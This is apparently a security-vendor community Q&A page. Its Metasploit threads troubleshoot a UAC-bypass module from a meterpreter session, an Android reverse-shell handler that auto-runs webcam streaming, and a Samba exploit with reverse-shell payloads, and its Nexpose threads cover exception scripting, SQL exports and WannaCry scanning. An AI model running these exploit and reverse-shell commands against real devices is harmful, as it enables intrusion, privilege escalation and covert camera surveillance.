1
ANSWERED

Metasploit: Bypass UAC Module Not Working [dr.dinosaur]

Can someone tell me what's going on here? I have a meterpreter session; it works fine. To bypass UAC in an effort to get SYSTEM, I am using the Bypass UAC module. It seems to think I am using the x86 version, even though I specified the x64 version. I also tried the x86 version, which didn't work. I have also migrated to two different x86_64 processes, but that didn't help. Thanks.

~~~~
msf exploit(bypassuac_injection) > info

       Name: Windows Escalate UAC Protection Bypass (In Memory Injection)
     Module: exploit/windows/local/bypassuac_injection
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  David Kennedy "ReL1K"
  mitnick
  mubix
  Ben Campbell

Available targets:
  Id  Name
  --  ----
  0   Windows x86
  1   Windows x64

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module will bypass Windows UAC by utilizing the trusted publisher
  certificate through process injection. It will spawn a second shell
  that has the UAC flag turned off. This module uses the Reflective DLL
  Injection technique to drop only the DLL payload binary instead of
  three seperate binaries in the standard technique. However, it
  requires the correct architecture to be selected, (use x64 for
  SYSWOW64 systems also). If specifying EXE::Custom your DLL should
  call ExitProcess() after starting your payload in a seperate process.

msf exploit(bypassuac_injection) > set TARGET 1
TARGET => 1
msf exploit(bypassuac_injection) > set SESSION 1
SESSION => 1
msf exploit(bypassuac_injection) > exploit

[*] Started reverse handler on 192.168.2.217:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[-] Exploit failed [bad-config]: x86 Target Selected for x64 System
msf exploit(bypassuac_injection) > show options

Module options (exploit/windows/local/bypassuac_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.217    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows x64

msf exploit(bypassuac_injection) > set TARGET 0
TARGET => 0
msf exploit(bypassuac_injection) > exploit

[*] Started reverse handler on 192.168.2.217:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[-] Exploit failed: Rex::TimeoutError Operation timed out.
msf exploit(bypassuac_injection) > exploit

[*] Started reverse handler on 192.168.2.217:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[-] Exploit failed [bad-config]: x86 Target Selected for x64 System
msf exploit(bypassuac_injection) > set TARGET 1
TARGET => 1
msf exploit(bypassuac_injection) > exploit

[*] Started reverse handler on 192.168.2.217:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Unable to identify admin group membership
[-] Either whoami is not there or failed to execute
[-] Continuing under assumption you already checked...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[-] Exploit failed [bad-config]: x86 Target Selected for x64 System
msf exploit(bypassuac_injection) > exploit

[*] Started reverse handler on 192.168.2.217:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[-] Exploit failed [bad-config]: x86 Target Selected for x64 System
msf exploit(bypassuac_injection) >
~~~~

Posted by Stephanie Coyle 2 years ago

3
ANSWERED

Nexpose: I am having trouble applying expections to asset group via API [David Mir]

I'm not a Ruby programmer, but I have been trying to get misterpaul's Ruby script to work with the latest Nexpose API. Basically, I want to apply exceptions to an asset group I have created, based on the script found on his site here: https://github.com/misterpaul/NexposeRubyScripts/blob/master/ApplyExceptionToGroup/ApplyExceptionToGroup.rb However, this doesn't work with the latest API, so I rewrote most of the beginning to make it work, but I am having issues with the last part about listing all exceptions and filtering out devices to apply exceptions to the asset group's devices. Any help would be appreciated. Thank you. I have my code listed below, from misterpaul's, with comments on the changes I made.

~~~~
# gem 'nexpose', '=0.0.98'
require 'rubygems'
require 'date'
require 'nexpose'
require 'highline/import'
require 'csv'

thedate = DateTime.now

# Defaults: Change to suit your environment.
# default_host = 'your-host'
# default_port = 3780
# default_name = 'your-nexpose-id'
default_host = 'OurNexposeIP'
default_port = 3780
default_name = 'MyUserName'
default_file = 'ExceptionList_' + thedate.strftime('%Y-%m-%d--%H%M') + '.csv'
default_logfile = 'ApplyExceptionToGroup_' + thedate.strftime('%Y-%m-%d--%H%M') + '.log'
default_filter = 'none'

puts # blank line for clarity
host = ask('Enter the server name (host) for Nexpose: ') { |q| q.default = default_host }
port = ask('Enter the port for Nexpose: ') { |q| q.default = default_port.to_s }
user = ask('Enter your username: ') { |q| q.default = default_name }
pass = ask('Enter your password: ') { |q| q.echo = '*' }
puts
file = ask('Enter the filename for a list of current vulnerability exceptions. Enter "none" (without quotes) if you don\'t want to create the file: ') { |q| q.default = default_file }
puts
logfile = ask('Enter the filename to log results into: ') { |q| q.default = default_logfile }

begin
  # Create a connection to the NeXpose instance
  @nsc = Nexpose::Connection.new(host, user, pass, port)
  # Authenticate to this instance (throws an exception if this fails)
  @nsc.login

  # get all vulnerability exceptions and load them in a file for the user to select one to replicate
  exceptions = @nsc.list_vuln_exceptions
  unless file == 'none'
    begin
      CSV.open(file, 'wb') do |csv|
~~~~

**The following section from misterpaul did not work for me**

~~~~
#        csv << ['Vuln ID', 'Exception ID', 'Submitter', 'Reviewer', 'Status', 'Reason', 'Scope', 'Device id', 'port', 'expiration', 'vuln key', 'submitter comment', 'reviewer comment']
#        exceptions.each do |e|
#          csv << e.values
#        end
#      end
#      puts
#      puts 'You may now go open ' + file + ' to find the exception id(s) you want.'
#    rescue Exception => e
#      puts 'Failed to create Exception listing file: ' + file
#      puts e
#    end
#  end
~~~~

**This is my code rewrite of the above section**

~~~~
        csv << ['Vuln ID', 'Exception ID', 'Submitter', 'Reviewer', 'Status', 'Reason', 'Scope', 'Device id', 'port', 'expiration', 'vuln key', 'submitter comment', 'reviewer comment']
        exceptions.each do |e|
          csv << [e.vuln_id, e.id, e.submitter, e.reviewer, e.status, e.reason, e.scope, e.asset_id, e.port, e.expiration, e.vuln_key, e.submitter_comment, e.reviewer_comment]
        end
      end
      puts
      puts 'You may now go open ' + file + ' to find the exception id(s) you want.'
    rescue Exception => e
      puts 'Failed to create Exception listing file: ' + file
      puts e
    end
  end

  # now select the exception(s) to replicate
  puts
  replicateIds = ask('Enter the id(s) for exception to replicate for the group (separate ids by spaces): ')
  idList = replicateIds.split(' ')
~~~~

**The following section ALSO did not work for me**

~~~~
#  # select which group we're creating exceptions for
#  puts
#  filter = ask('Enter a string to use to filter the group list. Enter "none" (without quotes) for no filter: ') { |q| q.default = default_filter }
#  grouplist = @nsc.asset_groups_listing.sort_by { |g| g[:name] }.select { |h| filter != 'none' ? h[:name] =~ /#{filter}/i : true }
#  choicemap = Hash.new
#  choice = choose do |menu|
#    menu.prompt = 'Please select the group to use:'
#    grouplist.each do |grp|
#      menu.choice(grp[:name])
#      choicemap[grp[:name]] = grp[:asset_group_id]
#    end
#  end
#  asset_group = @nsc.asset_group_config(choicemap[choice])
~~~~

**So, I ALSO rewrote the above section to something that worked for me, listed below**

~~~~
  # select which group we're creating exceptions for
  puts
  filter = ask('Enter a string to use to filter the group list. Enter "none" (without quotes) for no filter: ') { |q| q.default = default_filter }
  grouplist = @nsc.list_asset_groups.sort_by { |g| g.name }.select { |h| filter != 'none' ? h.name =~ /#{filter}/i : true }
  choicemap = Hash.new
  choice = choose do |menu|
    menu.prompt = 'Please select the group to use:'
    grouplist.each do |grp|
      menu.choice(grp.name)
      choicemap[grp.name] = grp.id
    end
  end
  puts choicemap[choice]
  asset_group = grouplist.select { |gp| gp.id == choicemap[choice] }
~~~~

The rest of his code worked fine, as shown below:

~~~~
  # get the details from the appropriate exception
  exceptions = @nsc.vuln_listing
  idList.each do |replicateId|
    replicate = Array.new     # array used to hold data to copy
    exceptionList = Array.new # array used to validate that an exception is only applied once
    exceptions.each do |e|
      if e[:exception_id] == replicateId
        replicate = e
      end
      exceptionList << { :device_id => e[:device_id].nil? ? '' : e[:device_id],
                         :vuln_id   => e[:vuln_id],
                         :scope     => e[:scope],
                         :port_no   => e[:port_no].nil? ? '' : e[:port_no],
                         :vuln_key  => e[:vuln_key].nil? ? '' : e[:vuln_key],
                         :status    => e[:status] }
    end

    # begin logging
    File.open(logfile, 'w') do |log|
      log.puts 'Log for ApplyExceptionToGroup, ' + thedate.strftime('%Y-%m-%d--%H%M')
      log.puts
      log.puts 'Exception to replicate:'
      log.puts 'exception_id: ' + replicateId + ', ' +
               'vuln_id: ' + replicate[:vuln_id] + ', ' +
               'device_id: ' + replicate[:device_id] + ', ' +
               'submitter: ' + replicate[:submitter] + ', ' +
               'reason: ' + replicate[:reason] + ', ' +
               'scope: ' + replicate[:scope] + ', ' +
               'comment: ' + (replicate[:submitter_comment].nil? ? '' : replicate[:submitter_comment].to_s) + ', ' +
               'port_no: ' + (replicate[:port_no].nil? ? '' : replicate[:port_no].to_s) + ', ' +
               'vuln_key: ' + (replicate[:vuln_key].nil? ? '' : replicate[:vuln_key].to_s)

      # add some info to the comment to document this script's actions
      comment = 'This exception auto-created using ApplyExceptionToGroup ruby script, based on Exception #' + replicateId +
                ' requested by ' + replicate[:submitter] + ', applied to group \'' + choice + "'.\r\n" +
                replicate[:submitter_comment].to_s
      # NOTE: use of double quotes required above for \r\n to work
      # comments cannot be more than 1024 characters
      if comment.length > 1024
        comment = comment.slice(0..1011) + ' [truncated]'
      end

      # now go create the new exceptions for each asset
      asset_group.each do |asset|
        log.puts # toss an extra line in for clarity
        # check for duplicates
        # a duplicate is an existing exception with the same device id, vulnerability id, scope, port, and vuln key
        # AND is not deleted
        dupe = exceptionList.select { |e|
          ((asset[:device_id].nil? ? '' : asset[:device_id].to_s) == e[:device_id].to_s) &&
          (replicate[:vuln_id].to_s == e[:vuln_id].to_s) &&
          (replicate[:scope].to_s == e[:scope].to_s) &&
          ((replicate[:port_no].nil? ? '' : replicate[:port_no].to_s) == e[:port_no].to_s) &&
          ((replicate[:vuln_key].nil? ? '' : replicate[:vuln_key].to_s) == e[:vuln_key].to_s) &&
          e[:status] != 'Deleted'
        }
        if dupe.size > 0
          log.puts 'Duplicate: did not create new exception for device ' + asset[:device_id].to_s
          next
        end

        # not a duplicate, so build the exception
        exceptionDetails = Hash.new
        exceptionDetails[:vuln_id] = replicate[:vuln_id]
        exceptionDetails[:reason] = replicate[:reason]
        exceptionDetails[:scope] = replicate[:scope]
        exceptionDetails[:comment] = comment
        exceptionDetails[:device_id] = asset[:device_id]
        unless replicate[:scope] =~ /All Instances on a Specific Asset/
          exceptionDetails[:port] = replicate[:port_no]
          exceptionDetails[:vuln_key] = replicate[:vuln_key]
        end
        exception = @nsc.vuln_exception_create(exceptionDetails)
        log.puts 'Created Exception:'
        log.puts 'exception_id: ' + exception.to_s + ', ' +
                 'vuln_id: ' + exceptionDetails[:vuln_id] + ', ' +
                 'device_id: ' + exceptionDetails[:device_id].to_s + ', ' +
                 'reason: ' + exceptionDetails[:reason] + ', ' +
                 'scope: ' + exceptionDetails[:scope] + ', ' +
                 'comment: ' + (exceptionDetails[:comment].nil? ? '' : exceptionDetails[:comment].to_s) + ', ' +
                 'port_no: ' + (exceptionDetails[:port].nil? ? '' : exceptionDetails[:port].to_s) + ', ' +
                 'vuln_key: ' + (exceptionDetails[:vuln_key].nil? ? '' : exceptionDetails[:vuln_key].to_s)
      end
    end
  end
rescue ::Nexpose::APIError => e
  # double quotes are required for #{} interpolation to work
  $stderr.puts "Nexpose API failure: #{e.reason}"
  exit(1)
  # should also rescue file errors
end
~~~~

Can anyone help me?

Posted by Stephanie Coyle 2 years ago

1
ANSWERED

Nexpose: Export all SQL tables using the API [vmpman]

A few months ago, I needed to reproduce the data reporting model outside of Nexpose. If you copy all of the files that this script creates into your favorite DB package, you can then use a graphical query editor to better visualize your data. This will basically create a new file for every Fact and Dimension in the model. If you want to restrict by site etc., you'll need to add additional filters. This is effectively a manual alternative to the Data Warehouse option in Nexpose. Thanks to [John Aldridge] and [zeroorone] for the help. Enjoy:

**<Enclosed Brackets> = Edit this text**

```ruby
require 'nexpose'
require 'csv'

# Exports one reporting-model table to a CSV file via an ad hoc SQL report.
# Returns a "Success: ..." or "Error: ..." string describing the outcome.
def runreport(sql_table, where_clause)
  nsc = nil
  begin
    nsc = Nexpose::Connection.new('<Your Rapid7 Console>', '<User account name>', '<Password for user account>')
    nsc.login

    query = "SELECT * FROM #{sql_table}"
    query = "#{query} #{where_clause}" unless where_clause.nil?
    puts query

    report_config = Nexpose::AdhocReportConfig.new(nil, 'sql')
    report_config.add_filter('version', '2.0.1')
    report_config.add_filter('query', query)
    # If you want to restrict by a site or asset group, add a filter similar to the lines above.
    report_output = report_config.generate(nsc)

    csv_output = CSV.parse(report_output.chomp, headers: :first_row)
    # Make sure you use double backslashes in Windows paths in Ruby, i.e. "\\" is turned into "\" by Ruby.
    CSV.open("\\<\\server\\path\\path\\>#{sql_table}.csv", 'w') do |csv_file|
      csv_file << csv_output.headers
      csv_output.each do |row|
        csv_file << row
      end
    end
    "Success: #{sql_table}.csv"
  rescue StandardError => e
    "Error: #{sql_table}, #{e}"
  ensure
    # Always close the console session, even when the export failed.
    nsc.logout if nsc && nsc.session_id
  end
end

# Everything from here down just calls the function above, once per Fact and Dimension table.
# To restrict a table, call runreport(table, 'WHERE ...') for it directly instead of nil.
TABLES = %w[
  fact_asset fact_asset_vulnerability_finding fact_asset_vulnerability_age
  fact_asset_vulnerability_instance fact_asset_vulnerability_instance_excluded
  fact_asset_discovery fact_asset_scan fact_asset_date fact_asset_policy_date
  fact_asset_scan_operating_system fact_asset_scan_software fact_asset_scan_service
  fact_asset_scan_vulnerability_finding fact_asset_scan_vulnerability_instance
  fact_asset_scan_vulnerability_instance_excluded fact_pci_asset_service_finding
  fact_pci_asset_scan_service_finding fact_pci_asset_special_note fact_asset_group
  fact_asset_group_date fact_asset_group_policy_date fact_tag fact_tag_date
  fact_tag_policy_date fact_scan fact_site fact_site_date fact_site_policy_date
  fact_vulnerability fact_remediation fact_remediation_impact fact_policy
  fact_asset_policy fact_asset_scan_policy fact_policy_rule fact_asset_policy_rule
  fact_policy_group
  dim_scope_site dim_scope_asset dim_scope_asset_group dim_scope_tag dim_scope_scan
  dim_scope_filter_vulnerability_status dim_scope_filter_vulnerability_category_include
  dim_scope_filter_vulnerability_category_exclude dim_scope_filter_vulnerability_severity
  dim_scope_policy dim_asset dim_asset_scan dim_asset_host_name dim_asset_ip_address
  dim_asset_mac_address dim_asset_operating_system dim_asset_software dim_asset_service
  dim_asset_service_configuration dim_asset_service_credential dim_asset_user_account
  dim_asset_group_account dim_asset_file dim_site dim_site_scan dim_site_scan_config
  dim_site_asset dim_site_target dim_asset_group dim_asset_group_asset dim_tag
  dim_tag_asset dim_scan dim_scan_template dim_scan_engine dim_software
  dim_operating_system dim_fingerprint_source dim_service dim_service_fingerprint
  dim_vulnerability dim_vulnerability_category dim_vulnerability_exploit
  dim_vulnerability_malware_kit dim_vulnerability_reference dim_vulnerability_exception
  dim_solution dim_vulnerability_solution dim_solution_highest_supercedence
  dim_solution_prerequisite dim_solution_supercedence dim_asset_vulnerability_solution
  dim_policy dim_policy_group dim_policy_rule dim_policy_override dim_scan_status
  dim_scan_type dim_host_name_source_type dim_host_type dim_vulnerability_status
  dim_cvss_access_vector dim_cvss_access_complexity dim_cvss_authentication
  dim_cvss_confidentiality_impact dim_cvss_integrity_impact dim_cvss_availability_impact
  dim_protocol dim_exception_scope dim_exception_reason dim_exception_status
  dim_policy_result_status dim_policy_override_scope dim_policy_override_review_state
  dim_credential_status dim_aggregated_credential_status dim_pci_note
  dim_mobile_asset_attribute
]

TABLES.each do |table|
  puts runreport(table, nil)
end
```

Posted by Edward Sheehy 2 years ago

4
ANSWERED

Nexpose: WannaCry - Scanning & Reporting [00jay]

In light of the recent WannaCry ransomware attacks, I thought it'd be great to share ways of finding out which assets are susceptible to this attack.

1. Create a custom scan template to check for MS17-010

The easiest way to create a custom template is by making a copy of an existing template:

* Administration tab -> Templates
* Click: "Manage"
* Copy the "Full audit enhanced logging without Web Spider" template
* IMPORTANT: Name your copy of the scan template
* Click: "Vulnerability Checks" tab
* Expand: "By Individual Check" dropdown
* Click: "Add Checks" button
* Enter: MS17-010 (As of 5/15/17, there are 192 individual checks)

Be sure to remove all checks from the "By Category" and "By Check Type" sections to ensure that only the individual checks are loaded for the scan(s).

2. If you want to create a Dynamic Asset Group (DAG) for assets vulnerable to this attack:

* Create a new DAG with the following filters:
  * 'CVE ID' 'is' CVE-2017-0143
  * 'CVE ID' 'is' CVE-2017-0144
  * 'CVE ID' 'is' CVE-2017-0145
  * 'CVE ID' 'is' CVE-2017-0146
  * 'CVE ID' 'is' CVE-2017-0147
  * 'CVE ID' 'is' CVE-2017-0148
* Change "Match (all) of the specified filters." to "Match (any) of the specified filters."
* Hit "SEARCH".

You should then have a result of all assets that have ANY of the CVEs specified above.

3. You can also create a SQL report to list ANY asset affected by ANY of the 6 CVEs:

```sql
SELECT da.ip_address   AS "IP Address",
       da.host_name    AS "Host Name",
       dv.title        AS "Title",
       dv.description  AS "Description",
       dv.severity     AS "Severity"
FROM dim_vulnerability dv
JOIN dim_asset_vulnerability_solution das USING (vulnerability_id)
JOIN dim_asset da USING (asset_id)
WHERE title ILIKE '%2017-0143%'
   OR title ILIKE '%2017-0144%'
   OR title ILIKE '%2017-0145%'
   OR title ILIKE '%2017-0146%'
   OR title ILIKE '%2017-0147%'
   OR title ILIKE '%2017-0148%'
```

(Please keep in mind that it will list every instance of any of the CVEs in question.)

There are currently 32 checks for each CVE and 6 CVEs, for a total of 192 checks. However, an asset should not list more than one check for each CVE, which should result in at most 6 instances per asset. You can create a SQL query that returns only the count or the unique instances, so that the report contains fewer rows.

Posted by Edward Sheehy 2 years ago

2
ANSWERED

Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole:

~~~~
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.240
set LPORT 3460
set ExitOnSession false
set AutoRunScript multi_console_command -rc scriptcamandroid.rc
exploit -j -z
~~~~

In the Metasploit root, the file `scriptcamandroid.rc` has the following commands:

~~~~
webcam_stream -i 2 -q 45 -d 84000
exit
~~~~

After Metasploit opens the session, it automatically starts autorun with this multi console command:

~~~~
Session ID 1 (192.168.0.240:3460 -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc'
Multi Command Execution Meterpreter Script
Console
~~~~

OPTIONS:

~~~~
-cl <opt>  Commands to execute. The command must be enclosed in double quotes and separated by a comma.
-h         Help menu.
-rc <opt>  Text file with list of commands, one per line.
-sl        Hide commands for work in background sessions
~~~~

The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the Linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly. I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Posted by Stephanie Coyle 2 years ago

1
ANSWERED

Metasploit: I receive a msfcli error when experimenting with Kali Linux [hcl]

I just started my experiments with Metasploit on Kali Linux. Here's what I did:

~~~~
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
~~~~

Pivoting to another:

~~~~
msf exploit(handler) > search samba
[!] Database not connected or cache not built, using slow search
~~~~

However, `db_rebuild_cache` did not help.

~~~~
msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp
[-] The value specified for PAYLOAD is not valid.
msf exploit(lsa_transnames_heap) > show payloads
msf exploit(lsa_transnames_heap) >
~~~~

Is there a reason why there are no payloads? The same payload loads fine in msfconsole. After that I did some testing and scrolling through commands, and this error pops up:

~~~~
[-] RbReadline Error: TypeError no implicit conversion from nil to integer
["/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `[]'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `update_line'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3526:in `block in rl_redisplay'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `each'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `rl_redisplay'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4665:in `_rl_internal_char_cleanup'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4726:in `readline_internal_charloop'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4790:in `readline_internal'",
 "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4812:in `readline'",
 "/opt/metasploit/apps/pro/msf3/lib/readline_compatible.rb:77:in `readline'",
 "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'",
 "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'",
 "/opt/metasploit/apps/pro/msf3/msfconsole:169:in `<main>'"]
~~~~

Well, after that I gave it another shot, and here is what I received:

~~~~
msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

[-] Invalid payload defined: linux/x86/shell/reverse_tcp
~~~~

The first two problems appear on two different machines; on the other two I did not try to replicate "database not connected" and the payload problem. Is msfcli being deprecated?

Posted by Stephanie Coyle 2 years ago